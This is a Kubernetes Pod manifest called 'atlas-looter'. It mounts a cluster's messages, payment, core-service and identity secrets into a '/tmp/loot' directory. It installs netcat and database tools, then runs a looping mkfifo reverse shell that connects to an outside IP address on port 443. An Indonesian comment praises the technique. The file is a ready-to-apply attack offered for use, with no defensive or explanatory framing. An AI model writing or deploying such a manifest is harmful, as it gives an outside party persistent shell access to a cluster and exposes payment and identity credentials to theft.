apiVersion: v1
kind: Pod
metadata:
  name: atlas-looter
  namespace: backbase
spec:
  containers:
  - name: looter-box
    image: alpine:latest
    command: ["/bin/sh", "-c"]
    args:
    - |
      apk add --update netcat-openbsd python3 mysql-client
      while true; do
        # Jurus sakti: Pake MKFIFO buat bikin jalur bolak-balik
        rm -f /tmp/f; mkfifo /tmp/f
        cat /tmp/f | /bin/sh -i 2>&1 | nc 203.175.125.130 443 > /tmp/f
        sleep 5
      done
    volumeMounts:
    - name: vol-msg
      mountPath: /tmp/loot/messages
    - name: vol-pay
      mountPath: /tmp/loot/payment
    - name: vol-core
      mountPath: /tmp/loot/core
    - name: vol-id
      mountPath: /tmp/loot/identity
  volumes:
  - name: vol-msg
    secret:
      secretName: messages-secret
      optional: true
  - name: vol-pay
    secret:
      secretName: payment-order-service
      optional: true
  - name: vol-core
    secret:
      secretName: atlas-core-service
      optional: true
  - name: vol-id
    secret:
      secretName: identity-secret
      optional: true
  restartPolicy: Never
